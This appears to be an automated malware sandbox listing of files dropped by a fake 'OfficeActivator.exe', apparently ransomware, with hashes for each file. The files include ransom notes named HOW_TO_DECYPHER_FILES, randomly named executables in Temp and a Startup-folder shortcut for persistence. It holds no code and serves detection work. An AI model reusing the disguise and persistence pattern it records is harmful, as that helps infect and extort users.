C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | ed54d6a7ac9cd9f067236f41ddd8aca9 |
| SHA1 | 387b716e05a68a01ac294b046133885883b7959c |
| SHA256 | 3f52b2e6c4f32af738ac5287142a1939be79e3baa3e952b249ba37ceecc40dfb |
| SHA512 | 7edc0b6a62a069eef21c0ab5158e424581dc2914cfb4d45e234fff75d57924e7df25d2a3bc33dadcdfc8cd48803abc243a54b5956da899069ff7a5b52b43ba45 |
C:\Users\Admin\Downloads\OfficeActivator.exe
| MD5 | 1b4e57be75e855e54e84f55874782d4b |
| SHA1 | f5f17bae63faad537233bb38647940bda7340b2c |
| SHA256 | 8441f92e8460a7b2ed37ee96affe547a65589b2e8e980a18a6b08b786b48465d |
| SHA512 | 076245019b439583d4a45e46e6c836a2724270aba0a6e1b04e20c4157bdb32533045ee118c22a013e6f7127f1d34eb8b82738156dd152dae7c4ef9da1cf39da9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | a6bee2fb2f9ded51b48962a72bf0d940 |
| SHA1 | c796d46ff64bf0b39bd4acbe7342d52199539f0e |
| SHA256 | 82e3963f94d3be9ee396084fe5a2ed22f2dd2d41968aa92158b7d27f0da98e77 |
| SHA512 | 6b0f1ab2d7704c8632b15314884d63b2c46601768ad5cf07f940961545a91e0298d78c25b275ca6738526aa5994e3c43a509aba2d3912fcad0ba5767e9c2d194 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 363c0e8450c81fe5be76e5934906ae36 |
| SHA1 | 0f092c7c45e6983dacdf0196050dae84d68e269e |
| SHA256 | 9fd27cc7c8ad13bd1e0bdf0d5fcab75f4804f48a5367daa60d78aa2b26769034 |
| SHA512 | d28ea8447bdd0191aa0880b0d4d23f7774ba38f5536a241dbbf3d0533b2e1ab621881f73290d7201e911082d38a8e740cea7843db1fe412913d3307a7ce32397 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe58170d.TMP
| MD5 | fa41970eceb5b7c8d21af2d2a5b4b561 |
| SHA1 | 202c49d31973fd3d31c022bf45275d2c385f00fe |
| SHA256 | 0b23f145c5ff868f6f22a88fd0d602d956022e7a8cd3527bb193afff424881ca |
| SHA512 | cc66e7888806216e2e2e5c87e9cdebf2a696835c7fe6beed38164c5cc13b04527df35da8a09b7a7e62535b72a1679cb3c8025a9170878a6ac4dfe2736027b047 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | eb4a42a14fef92c3acd66d98d8da545a |
| SHA1 | 5cefd1bbf574c0a5aa621454780298509147f54f |
| SHA256 | 14892dd8515f397565892526cd61e784af31aac4fd93fef929d97889809e46a5 |
| SHA512 | eaed57e8c7ee6a896462433b1f5de6f1a2b6792d7626f310e8efa9589277427c4bef6fa7b7c0eb31a67762557bb1b6236e3dbef825166de957c65b198e17a7c2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | d933556eb8f3bb05d3c2b8ab5ba7612f |
| SHA1 | 491c1e7a15008ed27352900e7fd61158c7474a97 |
| SHA256 | 14947edd5b81b0fbda9339a0a2ef9fc2e5a026aea59c17f84be3b0ebd0e7f814 |
| SHA512 | 4fafd51c98ea651eeba6d12e595c9d425b34d5e69b72577e51f2edab407f2153d22f1f0ad58c5c88788b45e4a885d75dfab994f39870acab45550cbf246e2d49 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 028a7e1de387c9199154a614c812bc06 |
| SHA1 | 318eaab49db228dc2819a749039da6eeb05ac068 |
| SHA256 | e8786afbc551d05a65551b8ce4a159175eeade5fe9ca8f072e1ced135ecf536a |
| SHA512 | 05efd21e7d49f6b6d867df89e51342a2293686d60141a8eaf6adec951284df2135dcbfd6b70a90678bcd9c111ae7bd3576507d1102c7d6298d09e32290050c5e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\2463a69e-ce05-4ad0-b311-eb4722bbdb99.tmp
| MD5 | c5647520dc84526a1c0906ab1a362c40 |
| SHA1 | 0a8f403a216426eeccf70e75e2a16c2b3dbda0bb |
| SHA256 | 86d553b1208bab41df1e0eaf378250af77099632293ba143a2d059042dac68c0 |
| SHA512 | 5dab4b7ef40c4d9d2de7da744a7fa82f156661efbb6a49c3fe9811e4f0771764260527aa2db181e9c068b6abdc32cbc113e41770987735f4036aacdb07b3e000 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 6b2b91e7953b719cf84646529a822c6f |
| SHA1 | 27f00206939a5441b1fd5ecbadbd525755cd2659 |
| SHA256 | 03633ed293eb831a9bb9fb524846d138a8609508496e8a14fc8e128bf46151a1 |
| SHA512 | 925c5b8a33f06cb56429bd923423987eb69c929dc099fc9f0f0edfb68cb77dc5ceb030678d8be2847060918924a265f7e4330b107c2e98da626d80ee6aa3206b |
memory/1676-464-0x0000000000870000-0x000000000088A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0i24erb4.pb4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5156-470-0x000002B325380000-0x000002B3253A2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ztqbqpbr.exe
| MD5 | b1dfb4f9eb3e598d1892a3bd3a92f079 |
| SHA1 | 0fc135b131d0bb47c9a0aaf02490701303b76d3b |
| SHA256 | ab50d8d707b97712178a92bbac74ccc2a5699eb41c17aa77f713ff3e568dcedb |
| SHA512 | 98454df86ddddf20e0b7bd19566006dbec431326e8aa57600aff460e9bec3e6489e43e95be3b252bf78a2edd5c203254508e9b55e756b680c100560664278ca2 |
C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
| MD5 | 1abdf83963ae454a026008f34689a52e |
| SHA1 | 8e266c755d1ba08d864c8c5c9fcdcce40cc11cb0 |
| SHA256 | 3697dfaf54d1065d5dafbb73ad3827f4e75faeb553495921528c93f65dd18979 |
| SHA512 | 1c6f488566ad1df7d4ee0da28519afbca4556a2a0759d477c9affb0075a6919a378baeaa0699ff5f890d8fe33af2e1ac80179719957f6e7bb13cb1d0f5593224 |
C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
| MD5 | d7471ba252ed7932174acec020112a56 |
| SHA1 | ed318a337230b78baa8496485cdd9f9e98cdf4a6 |
| SHA256 | e412c0093803d26c52b8149a043902c8f2ee05bb7a2d07b0f0b9017aa64d70ed |
| SHA512 | 80c8d61f4a21beefd55e696ac61d26b409d253d379dd5ca7406f80422e8dd817af7f0782674957f63514b4e86c2f9e6ed92a3a687b847ef48fe539e4cfacdd7b |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\OfficeActivator.exe.log
| MD5 | baf55b95da4a601229647f25dad12878 |
| SHA1 | abc16954ebfd213733c4493fc1910164d825cac8 |
| SHA256 | ee954c5d8156fd8890e582c716e5758ed9b33721258f10e758bdc31ccbcb1924 |
| SHA512 | 24f502fedb1a305d0d7b08857ffc1db9b2359ff34e06d5748ecc84e35c985f29a20d9f0a533bea32d234ab37097ec0481620c63b14ac89b280e75e14d19fd545 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6d3e9c29fe44e90aae6ed30ccf799ca8 |
| SHA1 | c7974ef72264bbdf13a2793ccf1aed11bc565dce |
| SHA256 | 2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d |
| SHA512 | 60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a |
C:\Users\Admin\AppData\Local\Temp\HOW_TO_DECYPHER_FILES.txt
| MD5 | e9eb3a155118e6c03e4e754d745eb2d8 |
| SHA1 | 9ba57dfada739c057e5734310a5c4d1516eeb7e9 |
| SHA256 | f35fadcf3e807fe29b15092060c4499e0ab0ca5c888e7888847d603a4a64fe99 |
| SHA512 | f407e46f6dfb8757cd026c76d1e4129a6b6b6d04afe3412e470931d731d32300aae5ac5d2bcbb2a6209d2aed78353ea6cbb38707bcff40b537e388634077b94b |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk
| MD5 | d717a5921753b2b308ac23a86db9fd25 |
| SHA1 | f24623960772a86aa47cc8eaaca1c23ad9f20bc1 |
| SHA256 | 9b9a8caa58197e3709a0811b92ca312378fcb755e6cc1707b4f53d8c1ca95929 |
| SHA512 | 0a557f861a97a964c14fa76de4b1120d54cbd5f6db0c5a672fc59d4a7ee864d6c532a2d771d234c7e6320f266bfc7f72457f4141aaf0bcd91befb75623354259 |
C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
| MD5 | 6781ac6cfd7c82f4ee7c1f3c5785c565 |
| SHA1 | b523ec6d2588eba58ec7b084bc46561d43c3c157 |
| SHA256 | 58eb76fc7ff697302e82adccc59811a739ee2ef999ec034e4f761390ba81bf9c |
| SHA512 | 538a79497005b4173bd09e7d29c896ec244c1a6c3194c9af23737b75c3a285e04b748d0a049225ad50fed43d1e21246f279eb8cebb4e686eee78ddb33b763c76 |
C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\HOW_TO_DECYPHER_FILES.txt
| MD5 | f0cfddce754a35e52dc4c0ed0eaca07e |
| SHA1 | 1acfd52bda6df1ae258fd408c7f3fd627af0ffb8 |
| SHA256 | e89ef91610e81b1dc16c04bbae9b65c8dfaaa1b1756f4fe9755483ed95b576ae |
| SHA512 | f928420ba7a51126be9723c3ab62a98a7a3c7c6b8c9fec291cd65491203f37cccb707ee78dd42ec82db8e3cbd64701113a66de7e471c5bb42eb7e95bd6946262 |
C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\HOW_TO_DECYPHER_FILES.txt
| MD5 | bda99dc37896638504a482323b315069 |
| SHA1 | 274774d9026553980de89273bac43e438555c3bf |
| SHA256 | 726bc80aeb7dba825e13df848b05cf73397094b0c526f912c78dfb0f3e0fb714 |
| SHA512 | 6ddd1417b7bed451ded6814945d09e676b5b889ae51c6334e9b3596b558b62a24c64e8cc78491e9f6dfa85f83746b5042d4ca90ac991a397ff9b0fb6d898f021 |
C:\Users\Admin\AppData\Local\Temp\fu025osp.exe
| MD5 | 3e0a2f96bc02b82231e877553e444bd5 |
| SHA1 | 3a673de3878e3af6914fe47cf0413ec72b8b7f89 |
| SHA256 | 18118e97f1a328f5a68f3a200e9db1ea6c1f225d025cd06afa4662f1aac4e96c |
| SHA512 | acc53f6c8c467a63f53afae02386171fb8d5474728059dfed48f759f81cfa4e385c3ebaed453abaf8841fef76e53e3a247f99db021a98babafcfec0aa357d97a |